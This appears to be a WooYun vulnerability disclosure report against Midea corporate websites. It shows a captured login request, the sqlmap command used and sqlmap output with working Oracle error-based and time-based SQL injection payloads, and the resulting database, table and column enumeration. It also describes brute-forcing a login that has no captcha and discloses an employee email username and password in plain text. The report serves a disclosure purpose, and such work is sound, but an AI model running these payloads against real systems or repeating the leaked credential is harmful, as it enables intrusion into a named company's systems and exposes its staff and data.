乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-11: 细节已通知厂商并且等待厂商处理中 2015-12-11: 厂商已经确认,细节仅向厂商公开 2015-12-21: 细节向核心白帽子及相关领域专家公开 2015-12-31: 细节向普通白帽子公开 2016-01-10: 细节向实习白帽子公开 2016-01-23: 细节向公众公开
求上个首页,谢谢审核大大^_^
0X01 首先是sql注入漏洞漏洞地址:
http://jders.midea.com.cn/Login.aspx
经过简单测试发现并没有过滤
burp抓包 post.txt:
POST /Login.aspx?_dc=1449797912532 HTTP/1.1Accept: */*X-Ext.Net: delta=trueX-Requested-With: XMLHttpRequestContent-Type: application/x-www-form-urlencoded; charset=UTF-8Referer: http://jders.midea.com.cn/Login.aspxAccept-Language: zh-CNAccept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: jders.midea.com.cnContent-Length: 3065Pragma: no-cache__EVENTTARGET=ResourceManager1&__EVENTARGUMENT=-%7Cpublic%7CbtLoginClick&__VIEWSTATE=%2FwEPDwUJMjA0NzAwMzA0D2QWAgIFD2QWBAIBD2QWGmYPZBYCZg8WAh4FY2xhc3MFCHgtaGlkZGVuFgICAQ9kFghmD2QWAmYPFgIfAAUIeC1oaWRkZW5kAgEPZBYCZg8WAh8ABQh4LWhpZGRlbmQCAg9kFgJmDxYCHwAFCHgtaGlkZGVuZAIDDxYCHwAFCHgtaGlkZGVuZAIBDxYCHwAFCHgtaGlkZGVuZAICDxQqElN5c3RlbS5XZWIuVUkuUGFpcgEPBQRiYXNlDxYCHgpBdXRvUmVuZGVyaGQWAmYPFgIfAAUIeC1oaWRkZW5kAgMPFCsEAQ8FBGJhc2UPFgIfAWhkFgZmD2QWAmYPFgIfAAUIeC1oaWRkZW5kAgEPZBYCZg8WAh8ABQh4LWhpZGRlbmQCAg8WAh8ABQh4LWhpZGRlbmQCBA8UKwQBDwUEYmFzZQ8WAh8BaGQWBmYPZBYCZg8WAh8ABQh4LWhpZGRlbmQCAQ9kFgRmD2QWAmYPFgIfAAUIeC1oaWRkZW5kAgEPFgIfAAUIeC1oaWRkZW5kAgIPFgIfAAUIeC1oaWRkZW5kAgUPFCsEAQ8FBGJhc2UPFgIfAWhkFgZmD2QWAmYPFgIfAAUIeC1oaWRkZW5kAgEPZBYCZg8WAh8ABQh4LWhpZGRlbmQCAg8WAh8ABQh4LWhpZGRlbmQCBg8UKwQBDwUEYmFzZQ8WBB4FVmFsdWVlHwFoZBYCZg8WAh8ABQh4LWhpZGRlbmQCBw8UKwQBDwUEYmFzZQ8WBB8CBUBPREF4TmtSRk1EWkJNa1JCTUROQlFUVXhNVE5HUVRoQk5qbEJNVFZDUlROQ05UY3lNMFU1UkRsRVFrTkRNRUk1HwFoZBYCZg8WAh8ABQh4LWhpZGRlbmQCCA8UKwQBDwUEYmFzZQ8WBB8CBRhOVFkyT0RSRE0wUXhPREZETnpRNU5nPT0fAWhkFgJmDxYCHwAFCHgtaGlkZGVuZAIJDxQrBAEPBQRiYXNlDxYEHwIFWFJUTXlRekkyUlVFMFJrSXlNalJFUkVWQlEwUTVNamszT1VKRVF6azNOMFUyUmpneFJqRTVSRUZGT1VRMk1USXlRVGd5UkRBd01rVkRNVEpGTlRKRFFRPT0fAWhkFgJmDxYCHwAFCHgtaGlkZGVuZAIKDxQrBAEPBQRiYXNlDxYEHwIFLE9VSkJOME16TlRSR01qRTNNMEV6UkVaRlJFRTVNVGxHTmpZMk9ERkVORFU9HwFoZBYCZg8WAh8ABQh4LWhpZGRlbmQCCw8UKwQBDwUEYmFzZQ8WBB8CBSxNakF5TWpNME5qRXpPRFE0UVVSRFJqZ3dRVGN4UlRNMVJqSkRNRE14UVRZPR8BaGQWAmYPFgIfAAUIeC1oaWRkZW5kAgwPFCsEAQ8FBGJhc2UPFgIfAWhkFgJmDxYCHwAFCHgtaGlkZGVuZAIDDxQrBAEPBQRiYXNlDxYCHgNDbHMFEHgtaW5saW5lLXRvb2xiYXJkFhZmD2QWBGYPZBYCZg8WAh8ABQh4LWhpZGRlbmQCAQ8WAh8ABQh4LWhpZGRlbmQCAQ9kFgRmD2QWAmYPFgIfAAUIeC1oaWRkZW5kAgEPFgIfAAUIeC1oaWRkZW5kAgIPZBYCZg8WAh8ABQh4LWhpZGRlbmQCAw9kFgRmD2QWAmYPFgIfAAUIeC1oaWRkZW5kAgEPFgIfAAUIeC1oaWRkZW5kAgQPZBYCZg8WAh8ABQh4LWhpZGRlbmQCBQ9kFgRmD2QWAmYPFgIfAAUIeC1oaWRkZW5kAgEPFgIfAAUIeC1oaWRkZW5kAgYPZBYCZg8WAh8ABQh4LWhpZGRlbmQCBw9kFgRmD2QWAmYPFgIfAAUIeC1oaWRkZW5kAgEPFgIfAAUIeC1oaWRkZW5kAggPZBYCZg8WAh8ABQh4LWhpZGRlbmQCCQ9kFgRmD2QWAmYPFgIfAAUIeC1oaWRkZW5kAgEPFgIfAAUIeC1oaWRkZW5kAgoPFgIfAAUIeC1oaWRkZW5kGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYhBRBSZXNvdXJjZU1hbmFnZXIxBQdXaW5kb3cxBQ9Db21wb3NpdGVGaWVsZDEFA2RmMQULTGlua0J1dHRvbjIFBXRiVWlkBQ9Db21wb3NpdGVGaWVsZDIFBXRiUHdkBQtMaW5rQnV0dG9uMQUPQ29tcG9zaXRlRmllbGQzBQdybWJVc2VyBQhUb29sVGlwOQUPQ29tcG9zaXRlRmllbGQ0BQdidExvZ2luBQNsYjIFA2xiMwUDbGI0BQNsYjUFA2xiNgUDbGI3BQNsYjgFB0J1dHRvbjYFCFRvb2xUaXA2BQhCdXR0b24xMAUJVG9vbFRpcDEwBQdCdXR0b241BQhUb29sVGlwMwUHQnV0dG9uOAUIVG9vbFRpcDgFB0J1dHRvbjIFCFRvb2xUaXA0BQdCdXR0b24xBQhUb29sVGlwNTWB0VEQPJqFx4OoCMNox9EYBxl3xRERRkXK5LN5I3Mk&__EVENTVALIDATION=%2FwEWAgK0u6rDCwLk1b%2BVAi55K9r446%2BWQ%2F9WWUM6RazKyEiocm%2B1YmrC0EF2wUzN&IsApp=undefined&tbUid=dd&tbPwd=dd&lb2=&lb3=ODAxNkRFMDZBMkRBMDNBQTUxMTNGQThBNjlBMTVCRTNCNTcyM0U5RDlEQkNDMEI5&lb4=NTY2ODRDM0QxODFDNzQ5Ng%3D%3D&lb5=RTMyQzI2RUE0RkIyMjREREVBQ0Q5Mjk3OUJEQzk3N0U2RjgxRjE5REFFOUQ2MTIyQTgyRDAwMkVDMTJFNTJDQQ%3D%3D&lb6=OUJBN0MzNTRGMjE3M0EzREZFREE5MTlGNjY2ODFENDU%3D&lb7=MjAyMjM0NjEzODQ4QURDRjgwQTcxRTM1RjJDMDMxQTY%3D&lb8=
sqlmap命令:
sqlmap.py -r post.txt --dbs -p tbUid --dbms oracle
结果:
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n]POST parameter 'tbUid' is vulnerable. Do you want to keep testing the others (if any)? [y/N]sqlmap identified the following injection point(s) with a total of 170 HTTP(s) requests:---Parameter: tbUid (POST) Type: error-based Title: Oracle AND error-based - WHERE or HAVING clause (XMLType) Payload: __EVENTTARGET=ResourceManager1&__EVENTARGUMENT=-|public|btLoginClick&__VIEWSTATE=/wEPDwUJMjA0NzAwMzA0D2QWAgIFD2QWBAIBD2QWGmYPZBYCZg8WAh4FY2xhc3MFCHgtaGlkZGVuFgICAQ9kFghmD2QWAmYPFgIfAAUIeC1oaWRkZW5kAgEPZBYCZg8WAh8ABQh4LWhpZGRlbmQCAg9kFgJmDxYCHwAFCHgtaGlkZGVuZAIDDxYCHwAFCHgtaGlkZGVuZAIBDxYCHwAFCHgtaGlkZGVuZAICDxQqElN5c3RlbS5XZWIuVUkuUGFpcgEPBQRiYXNlDxYCHgpBdXRvUmVuZGVyaGQWAmYPFgIfAAUIeC1oaWRkZW5kAgMPFCsEAQ8FBGJhc2UPFgIfAWhkFgZmD2QWAmYPFgIfAAUIeC1oaWRkZW5kAgEPZBYCZg8WAh8ABQh4LWhpZGRlbmQCAg8WAh8ABQh4LWhpZGRlbmQCBA8UKwQBDwUEYmFzZQ8WAh8BaGQWBmYPZBYCZg8WAh8ABQh4LWhpZGRlbmQCAQ9kFgRmD2QWAmYPFgIfAAUIeC1oaWRkZW5kAgEPFgIfAAUIeC1oaWRkZW5kAgIPFgIfAAUIeC1oaWRkZW5kAgUPFCsEAQ8FBGJhc2UPFgIfAWhkFgZmD2QWAmYPFgIfAAUIeC1oaWRkZW5kAgEPZBYCZg8WAh8ABQh4LWhpZGRlbmQCAg8WAh8ABQh4LWhpZGRlbmQCBg8UKwQBDwUEYmFzZQ8WBB4FVmFsdWVlHwFoZBYCZg8WAh8ABQh4LWhpZGRlbmQCBw8UKwQBDwUEYmFzZQ8WBB8CBUBPREF4TmtSRk1EWkJNa1JCTUROQlFUVXhNVE5HUVRoQk5qbEJNVFZDUlROQ05UY3lNMFU1UkRsRVFrTkRNRUk1HwFoZBYCZg8WAh8ABQh4LWhpZGRlbmQCCA8UKwQBDwUEYmFzZQ8WBB8CBRhOVFkyT0RSRE0wUXhPREZETnpRNU5nPT0fAWhkFgJmDxYCHwAFCHgtaGlkZGVuZAIJDxQrBAEPBQRiYXNlDxYEHwIFWFJUTXlRekkyUlVFMFJrSXlNalJFUkVWQlEwUTVNamszT1VKRVF6azNOMFUyUmpneFJqRTVSRUZGT1VRMk1USXlRVGd5UkRBd01rVkRNVEpGTlRKRFFRPT0fAWhkFgJmDxYCHwAFCHgtaGlkZGVuZAIKDxQrBAEPBQRiYXNlDxYEHwIFLE9VSkJOME16TlRSR01qRTNNMEV6UkVaRlJFRTVNVGxHTmpZMk9ERkVORFU9HwFoZBYCZg8WAh8ABQh4LWhpZGRlbmQCCw8UKwQBDwUEYmFzZQ8WBB8CBSxNakF5TWpNME5qRXpPRFE0UVVSRFJqZ3dRVGN4UlRNMVJqSkRNRE14UVRZPR8BaGQWAmYPFgIfAAUIeC1oaWRkZW5kAgwPFCsEAQ8FBGJhc2UPFgIfAWhkFgJmDxYCHwAFCHgtaGlkZGVuZAIDDxQrBAEPBQRiYXNlDxYCHgNDbHMFEHgtaW5saW5lLXRvb2xiYXJkFhZmD2QWBGYPZBYCZg8WAh8ABQh4LWhpZGRlbmQCAQ8WAh8ABQh4LWhpZGRlbmQCAQ9kFgRmD2QWAmYPFgIfAAUIeC1oaWRkZW5kAgEPFgIfAAUIeC1oaWRkZW5kAgIPZBYCZg8WAh8ABQh4LWhpZGRlbmQCAw9kFgRmD2QWAmYPFgIfAAUIeC1oaWRkZW5kAgEPFgIfAAUIeC1oaWRkZW5kAgQPZBYCZg8WAh8ABQh4LWhpZGRlbmQCBQ9kFgRmD2QWAmYPFgIfAAUIeC1oaWRkZW5kAgEPFgIfAAUIeC1oaWRkZW5kAgYPZBYCZg8WAh8ABQh4LWhpZGRlbmQCBw9kFgRmD2QWAmYPFgIfAAUIeC1oaWRkZW5kAgEPFgIfAAUIeC1oaWRkZW5kAggPZBYCZg8WAh8ABQh4LWhpZGRlbmQCCQ9kFgRmD2QWAmYPFgIfAAUIeC1oaWRkZW5kAgEPFgIfAAUIeC1oaWRkZW5kAgoPFgIfAAUIeC1oaWRkZW5kGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYhBRBSZXNvdXJjZU1hbmFnZXIxBQdXaW5kb3cxBQ9Db21wb3NpdGVGaWVsZDEFA2RmMQULTGlua0J1dHRvbjIFBXRiVWlkBQ9Db21wb3NpdGVGaWVsZDIFBXRiUHdkBQtMaW5rQnV0dG9uMQUPQ29tcG9zaXRlRmllbGQzBQdybWJVc2VyBQhUb29sVGlwOQUPQ29tcG9zaXRlRmllbGQ0BQdidExvZ2luBQNsYjIFA2xiMwUDbGI0BQNsYjUFA2xiNgUDbGI3BQNsYjgFB0J1dHRvbjYFCFRvb2xUaXA2BQhCdXR0b24xMAUJVG9vbFRpcDEwBQdCdXR0b241BQhUb29sVGlwMwUHQnV0dG9uOAUIVG9vbFRpcDgFB0J1dHRvbjIFCFRvb2xUaXA0BQdCdXR0b24xBQhUb29sVGlwNTWB0VEQPJqFx4OoCMNox9EYBxl3xRERRkXK5LN5I3Mk&__EVENTVALIDATION=/wEWAgK0u6rDCwLk1b+VAi55K9r446+WQ/9WWUM6RazKyEiocm+1YmrC0EF2wUzN&IsApp=undefined&tbUid=dd' AND 5553=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(120)||CHR(118)||CHR(113)||CHR(113)||(SELECT (CASE WHEN (5553=5553) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(118)||CHR(112)||CHR(122)||CHR(113)||CHR(62))) FROM DUAL) AND 'nhrH'='nhrH&tbPwd=dd&lb2=&lb3=ODAxNkRFMDZBMkRBMDNBQTUxMTNGQThBNjlBMTVCRTNCNTcyM0U5RDlEQkNDMEI5&lb4=NTY2ODRDM0QxODFDNzQ5Ng==&lb5=RTMyQzI2RUE0RkIyMjREREVBQ0Q5Mjk3OUJEQzk3N0U2RjgxRjE5REFFOUQ2MTIyQTgyRDAwMkVDMTJFNTJDQQ==&lb6=OUJBN0MzNTRGMjE3M0EzREZFREE5MTlGNjY2ODFENDU=&lb7=MjAyMjM0NjEzODQ4QURDRjgwQTcxRTM1RjJDMDMxQTY=&lb8= Type: AND/OR time-based blind Title: Oracle AND time-based blind (heavy query) Payload: __EVENTTARGET=ResourceManager1&__EVENTARGUMENT=-|public|btLoginClick&__VIEWSTATE=/wEPDwUJMjA0NzAwMzA0D2QWAgIFD2QWBAIBD2QWGmYPZBYCZg8WAh4FY2xhc3MFCHgtaGlkZGVuFgICAQ9kFghmD2QWAmYPFgIfAAUIeC1oaWRkZW5kAgEPZBYCZg8WAh8ABQh4LWhpZGRlbmQCAg9kFgJmDxYCHwAFCHgtaGlkZGVuZAIDDxYCHwAFCHgtaGlkZGVuZAIBDxYCHwAFCHgtaGlkZGVuZAICDxQqElN5c3RlbS5XZWIuVUkuUGFpcgEPBQRiYXNlDxYCHgpBdXRvUmVuZGVyaGQWAmYPFgIfAAUIeC1oaWRkZW5kAgMPFCsEAQ8FBGJhc2UPFgIfAWhkFgZmD2QWAmYPFgIfAAUIeC1oaWRkZW5kAgEPZBYCZg8WAh8ABQh4LWhpZGRlbmQCAg8WAh8ABQh4LWhpZGRlbmQCBA8UKwQBDwUEYmFzZQ8WAh8BaGQWBmYPZBYCZg8WAh8ABQh4LWhpZGRlbmQCAQ9kFgRmD2QWAmYPFgIfAAUIeC1oaWRkZW5kAgEPFgIfAAUIeC1oaWRkZW5kAgIPFgIfAAUIeC1oaWRkZW5kAgUPFCsEAQ8FBGJhc2UPFgIfAWhkFgZmD2QWAmYPFgIfAAUIeC1oaWRkZW5kAgEPZBYCZg8WAh8ABQh4LWhpZGRlbmQCAg8WAh8ABQh4LWhpZGRlbmQCBg8UKwQBDwUEYmFzZQ8WBB4FVmFsdWVlHwFoZBYCZg8WAh8ABQh4LWhpZGRlbmQCBw8UKwQBDwUEYmFzZQ8WBB8CBUBPREF4TmtSRk1EWkJNa1JCTUROQlFUVXhNVE5HUVRoQk5qbEJNVFZDUlROQ05UY3lNMFU1UkRsRVFrTkRNRUk1HwFoZBYCZg8WAh8ABQh4LWhpZGRlbmQCCA8UKwQBDwUEYmFzZQ8WBB8CBRhOVFkyT0RSRE0wUXhPREZETnpRNU5nPT0fAWhkFgJmDxYCHwAFCHgtaGlkZGVuZAIJDxQrBAEPBQRiYXNlDxYEHwIFWFJUTXlRekkyUlVFMFJrSXlNalJFUkVWQlEwUTVNamszT1VKRVF6azNOMFUyUmpneFJqRTVSRUZGT1VRMk1USXlRVGd5UkRBd01rVkRNVEpGTlRKRFFRPT0fAWhkFgJmDxYCHwAFCHgtaGlkZGVuZAIKDxQrBAEPBQRiYXNlDxYEHwIFLE9VSkJOME16TlRSR01qRTNNMEV6UkVaRlJFRTVNVGxHTmpZMk9ERkVORFU9HwFoZBYCZg8WAh8ABQh4LWhpZGRlbmQCCw8UKwQBDwUEYmFzZQ8WBB8CBSxNakF5TWpNME5qRXpPRFE0UVVSRFJqZ3dRVGN4UlRNMVJqSkRNRE14UVRZPR8BaGQWAmYPFgIfAAUIeC1oaWRkZW5kAgwPFCsEAQ8FBGJhc2UPFgIfAWhkFgJmDxYCHwAFCHgtaGlkZGVuZAIDDxQrBAEPBQRiYXNlDxYCHgNDbHMFEHgtaW5saW5lLXRvb2xiYXJkFhZmD2QWBGYPZBYCZg8WAh8ABQh4LWhpZGRlbmQCAQ8WAh8ABQh4LWhpZGRlbmQCAQ9kFgRmD2QWAmYPFgIfAAUIeC1oaWRkZW5kAgEPFgIfAAUIeC1oaWRkZW5kAgIPZBYCZg8WAh8ABQh4LWhpZGRlbmQCAw9kFgRmD2QWAmYPFgIfAAUIeC1oaWRkZW5kAgEPFgIfAAUIeC1oaWRkZW5kAgQPZBYCZg8WAh8ABQh4LWhpZGRlbmQCBQ9kFgRmD2QWAmYPFgIfAAUIeC1oaWRkZW5kAgEPFgIfAAUIeC1oaWRkZW5kAgYPZBYCZg8WAh8ABQh4LWhpZGRlbmQCBw9kFgRmD2QWAmYPFgIfAAUIeC1oaWRkZW5kAgEPFgIfAAUIeC1oaWRkZW5kAggPZBYCZg8WAh8ABQh4LWhpZGRlbmQCCQ9kFgRmD2QWAmYPFgIfAAUIeC1oaWRkZW5kAgEPFgIfAAUIeC1oaWRkZW5kAgoPFgIfAAUIeC1oaWRkZW5kGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYhBRBSZXNvdXJjZU1hbmFnZXIxBQdXaW5kb3cxBQ9Db21wb3NpdGVGaWVsZDEFA2RmMQULTGlua0J1dHRvbjIFBXRiVWlkBQ9Db21wb3NpdGVGaWVsZDIFBXRiUHdkBQtMaW5rQnV0dG9uMQUPQ29tcG9zaXRlRmllbGQzBQdybWJVc2VyBQhUb29sVGlwOQUPQ29tcG9zaXRlRmllbGQ0BQdidExvZ2luBQNsYjIFA2xiMwUDbGI0BQNsYjUFA2xiNgUDbGI3BQNsYjgFB0J1dHRvbjYFCFRvb2xUaXA2BQhCdXR0b24xMAUJVG9vbFRpcDEwBQdCdXR0b241BQhUb29sVGlwMwUHQnV0dG9uOAUIVG9vbFRpcDgFB0J1dHRvbjIFCFRvb2xUaXA0BQdCdXR0b24xBQhUb29sVGlwNTWB0VEQPJqFx4OoCMNox9EYBxl3xRERRkXK5LN5I3Mk&__EVENTVALIDATION=/wEWAgK0u6rDCwLk1b+VAi55K9r446+WQ/9WWUM6RazKyEiocm+1YmrC0EF2wUzN&IsApp=undefined&tbUid=dd' AND 9583=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND 'IqFl'='IqFl&tbPwd=dd&lb2=&lb3=ODAxNkRFMDZBMkRBMDNBQTUxMTNGQThBNjlBMTVCRTNCNTcyM0U5RDlEQkNDMEI5&lb4=NTY2ODRDM0QxODFDNzQ5Ng==&lb5=RTMyQzI2RUE0RkIyMjREREVBQ0Q5Mjk3OUJEQzk3N0U2RjgxRjE5REFFOUQ2MTIyQTgyRDAwMkVDMTJFNTJDQQ==&lb6=OUJBN0MzNTRGMjE3M0EzREZFREE5MTlGNjY2ODFENDU=&lb7=MjAyMjM0NjEzODQ4QURDRjgwQTcxRTM1RjJDMDMxQTY=&lb8=---[09:47:40] [INFO] the back-end DBMS is Oracleweb server operating system: Windows 2003 or XPweb application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0back-end DBMS: Oracle[09:47:40] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes[09:47:40] [INFO] fetching database (schema) names[09:47:49] [INFO] the SQL query used returns 8 entries[09:47:53] [INFO] retrieved: CTXSYS[09:47:56] [INFO] retrieved: EXFSYS[09:48:00] [INFO] retrieved: JD_ERS[09:48:03] [INFO] retrieved: MDSYS[09:48:07] [INFO] retrieved: OLAPSYS[09:48:10] [INFO] retrieved: SYS[09:48:13] [INFO] retrieved: SYSTEM[09:48:16] [INFO] retrieved: WLEAMavailable databases [8]:[*] CTXSYS[*] EXFSYS[*] JD_ERS[*] MDSYS[*] OLAPSYS[*] SYS[*] SYSTEM[*] WLEAM
涉及8个数据库:
当前库的所有表:
Database: JD_ERS[264 tables]+-------------------------------+| A || A1 || A2 || ACCOUNT_TEST || AF_APPLY_DETAIL_BUSI || AF_APPLY_DETAIL_CULTIVATE || AF_APPLY_DETAIL_EVENCTION || AF_APPLY_DETAIL_TEAM || AF_APPLY_DETAIL_UNIVERSAL || AF_APPLY_MAIN || AM_MAIL_TEMPLATE || AM_MAIL_TEMPLATE_WF || AM_SEND_MAIL_LOG || AP_PAYMENT_BILL_BACK || AP_PAYMENT_BUDGET_ALL || AP_PAYMENT_HEADER || AP_PAYMENT_INTERFACE || AP_PAYMENT_LINE || AP_PAYMENT_SCHEDULE_DETAIL || AP_PAYMENT_SCHEDULE_HEADER || AP_PAYMENT_SCHEDULE_LINE || AP_PAYMENT_SCHEDULE_RELATION || AP_PAYMENT_ZK_ALL || AUTHORITY_ORG_BUDGET || AUTHORITY_ORG_BUDGET_DETAIL || AUTHORITY_USER_DETAIL || B || BAOSI_REQUIRE_LOG || BAOSI_REQUIRE_RIGHT || BAOSI_SYS_PROJECT || BAS_ACCOUNT_TITLE || BAS_ACCOUNT_TITLE_DEPT || BAS_ACCOUNT_TITLE_OUTLAY || BAS_AREA || BAS_AREA_CITY || BAS_ATTACHMENT || BAS_BILL_NUMBER_ITEM || BAS_BILL_NUMBER_MAIN || BAS_BILL_NUMBER_RIGHT || BAS_BUDGET_AUTHORITY_DETAIL || BAS_BUDGET_AUTHORITY_MAIN || BAS_BUDGET_AUTHORITY_USERS || BAS_COSTCENTER || BAS_COSTINFORMATION_DATA || BAS_COST_ITEM || BAS_CURRENCY || BAS_EMAIL || BAS_ENTERTAIN || BAS_ERP_SYNCHRONOUS || BAS_EXCHANGE || BAS_HOLIDAY || BAS_LEVEL_AREA || BAS_LEVEL_POST || BAS_MIP_NOTIFY_INTERFACE || BAS_MODULE_MANAGEMENT || BAS_MODULE_WORKFLOW || BAS_ORG || BAS_ORGANIZATION || BAS_ORG_RIGHT || BAS_OUTLAY_ITEM_DATA || BAS_PAYMENT || BAS_PERSONAL || BAS_POSTLEVEL_TEMP || BAS_POSTLEVLE || BAS_PRIVATETOPUBLICCAR_DATA || BAS_PUBLICCAR_DATA || BAS_SECRETLEVEL_DATA || BAS_SECTION_CUSTOMER || BAS_SECTION_OFFICE || BAS_SUBJECT || BAS_SUBJECT_DEPT || BAS_SYNC_ERRITEMS || BAS_SYNC_LOG || BAS_TELEPHONE_DATA || BAS_TEMPLATE || BAS_TRAVEL_EXPENSE || BAS_URGENCYLEVEL_DATA || BAS_VENDOR || BD_BUDGET || BD_BUDGET_0804 || BD_BUDGET_20150208 || BD_BUDGET_20150302 || BD_BUDGET_20150822 || BD_BUDGET_20150825 || BD_BUDGET_ADD_DETAIL || BD_BUDGET_ADD_MAIN || BD_BUDGET_ADJUST_DETAIL || BD_BUDGET_ADJUST_MAIN || BD_BUDGET_APPLY_DETAIL || BD_BUDGET_APPLY_ITEM || BD_BUDGET_APPLY_MAIN || BD_BUDGET_F064 || BD_BUDGET_F080 || BD_BUDGET_INPUT_DETAIL || BD_BUDGET_INPUT_MAIN || BD_BUDGET_LOCK_REC || BD_BUDGET_ORG || BD_BUDGET_ORG_0804 || BD_BUDGET_ORG_COL || BD_BUDGET_ORG_COL_0804 || BD_BUDGET_ORG_DEPART || BD_BUDGET_ORG_DEPART_0804 || BD_BUDGET_ORG_USER || BD_BUDGET_ORG_USER_0804 || BD_BUDGET_T || BD_BUDGET_TEMP1 || BD_BUDGET_TEMP2 || BD_BUDGET_TEMP3 || BD_BUDGET_TEMPLATE_DETAIL || BD_BUDGET_TEMPLATE_MAIN || BD_BUDGET_TEMP_ZF || BD_BUDGET_TEST || BD_ORG || BD_TEST || BD_ZF_DR || BD_ZF_DR_2015 || BEE_ELECTRONICINVOICE || BEE_ELECTRONICINVOICEREL || BEE_ELECTRONICINVOICEREL_TEMP || BEE_ELECTRONICINVOICE_TEMP || BEE_INTERFACE_LIST || BEE_SYNC_LOG || BEE_TICKETBILLRELATION || BEE_TICKETBILLRELATION_TEMP || BEE_TICKETORDER || BEE_TICKETORDER_TEMP || BEE_TICKETSETTLEMENT || BEE_TICKETSETTLEMENTREL || BEE_TICKETSETTLEMENTREL_TEMP || BEE_TICKETSETTLEMENT_TEMP || BILL_RIGHT_DEPT || BILL_RIGHT_EMP || BILL_RIGHT_MAIN || BILL_RIGHT_MENU || BILL_TYPECODE_DATA || BUDGET_TEST || C || CASH_RECEIPT_INPUT || CASH_RECEIPT_INTERFACE || CASH_RECEIPT_LINE || CASH_RECEIPT_MAIN || CASH_RECEIPT_MARK_DETAIL || CASH_RECEIPT_MARK_HEADER || CASH_RECEIPT_MARK_LINE || CASH_RECEIPT_MARK_RELATION || DEPARTMENTNUMBER_TMP || DETAIN_AGREEMENT_HEADER || ERS_LOGS || FD_ADVANCE || FD_INVOICE || FD_LOAN || FD_PAYABLE_DETAIL || FD_PAYABLE_MAIN || FD_PAYMENT_REC || FD_REFUND || FD_REFUND_DETAIL || FD_VERFICATION || FD_VERFICATION_DETAIL || IMG_BILLCODE_STATUS_INTERFACE || IMG_SYNC_SET || LSS_067 || MP_MERGE_PAYMENT_DETAIL || MP_MERGE_PAYMENT_MAIN || MV_ERP_BANK_ACCOUNTS || MV_ERP_BUDGET_DETAIL || MV_ERP_CURRENCY || MV_ERP_DETAIL_SUBJECT || MV_ERP_EXCHANGE || MV_ERP_GL_CODE_COMBINATIONS || MV_ERP_PAYMENT_DOCUMENTS || MV_ERP_PAY_REC || MV_ERP_PAY_REC_TEST || MV_ERP_SUPPLIER || MV_ERP_SUPPLIER_SITE || MV_ERP_TERMS || PARTS || PBCATCOL || PBCATEDT || PBCATFMT || PBCATTBL || PBCATVLD || RP_DEIFINED_ORG_BUDGET || RS_BUSI_DETAIL || RS_COST_BEE_DETAIL || RS_COST_DETAIL || RS_COST_MAIN || RS_TRAVELLING_BEE_DETAIL || RS_TRAVELLING_DETAIL || RS_TRAVELLING_MAIN || S010 || S011 || S011_TEMP || S012 || S012_TEMP || S012_TEMP_ZF || S020 || S021 || S022 || S023 || S024 || S027 || S033 || S034 || S035 || S036 || S037 || S040 || S041 || S050 || S080 || S081 || S201 || S202 || S203 || S204 || S205 || S206 || S207 || S208 || S209 || S210 || S211 || S212 || S213 || S214 || S215 || S220 || S231 || S232 || S240 || S241 || S242 || S243 || S250 || S251 || S252 || S261 || S263 || S264 || S265 || S266 || S267 || S268 || SHARE_ACCOUNTS || SHARE_DETAIL || SHARE_MAIN || SMS_SEND || SMS_SEND_HISTORY || SMS_SYS_CONFIG || SUBJECT_TEST || SUPPLIER_BANK_ACCOUNTS || TEMP_ORACLEPANEL || TEMP_SVXBAR || TEMP_TABLESPACE || TEST1 || USER_TEMP || ZF_ACCOUNT || ZF_COSTCENTER || ZF_DEPT || ZF_DR_BUDGET || ZF_S011 || ZF_S207 || ZF_S267 || ZF_SUBJECT |+-------------------------------+
涉及大量敏感数据:
详细字段:
[11:16:34] [INFO] fetching columns for table 'BAS_EMAIL' in database 'JD_ERS'[11:16:34] [INFO] the SQL query used returns 18 entries[11:16:34] [INFO] resumed: CREATENAME[11:16:34] [INFO] resumed: VARCHAR2[11:16:34] [INFO] resumed: CREATETIME[11:16:34] [INFO] resumed: DATE[11:16:34] [INFO] resumed: UPDATEID[11:16:34] [INFO] resumed: VARCHAR2[11:16:34] [INFO] resumed: UPDATENAME[11:16:34] [INFO] resumed: VARCHAR2[11:16:34] [INFO] resumed: UPDATETIME[11:16:34] [INFO] resumed: DATE[11:16:34] [INFO] resumed: FD_ID[11:16:34] [INFO] resumed: NUMBER[11:16:34] [INFO] resumed: SEQUENCE_ID[11:16:34] [INFO] resumed: NUMBER[11:16:34] [INFO] resumed: EMAIL_SUBJECT[11:16:34] [INFO] resumed: VARCHAR2[11:16:34] [INFO] resumed: EMAIL_RECEIVER[11:16:34] [INFO] resumed: VARCHAR2[11:16:34] [INFO] resumed: OTHER_EMAIL[11:16:34] [INFO] resumed: VARCHAR2[11:16:34] [INFO] resumed: EMAIL_CONTENT[11:16:34] [INFO] resumed: CLOB[11:16:34] [INFO] resumed: EMAIL_FORMAT[11:16:34] [INFO] resumed: VARCHAR2[11:16:34] [INFO] resumed: EMAIL_SENDER[11:16:34] [INFO] resumed: VARCHAR2[11:16:34] [INFO] resumed: IS_BCC[11:16:34] [INFO] resumed: NUMBER[11:16:34] [INFO] resumed: PT_ID[11:16:34] [INFO] resumed: VARCHAR2[11:16:34] [INFO] resumed: UPLOAD_MIP_FLAG[11:16:34] [INFO] resumed: NUMBER[11:16:34] [INFO] resumed: SEND_FLAG[11:16:34] [INFO] resumed: NUMBER[11:16:34] [INFO] resumed: CREATEID[11:16:34] [INFO] resumed: VARCHAR2
0X02 某站弱口令漏洞地址:
http://eng.midea.com.cn/AccountManager/Login?ReturnUrl=%2fContract%2fAlterDetails%2f2e47465d-e155-4d9f-9386-72b1b3a155c2
由于无验证码
可爆破:
成功登录:
没想到还是管理员泄露公司敏感数据:
另外被忽略的漏洞
WooYun: 美的某员工邮箱弱口令
yangyt Midea123可泄露公司敏感文件,通讯录等
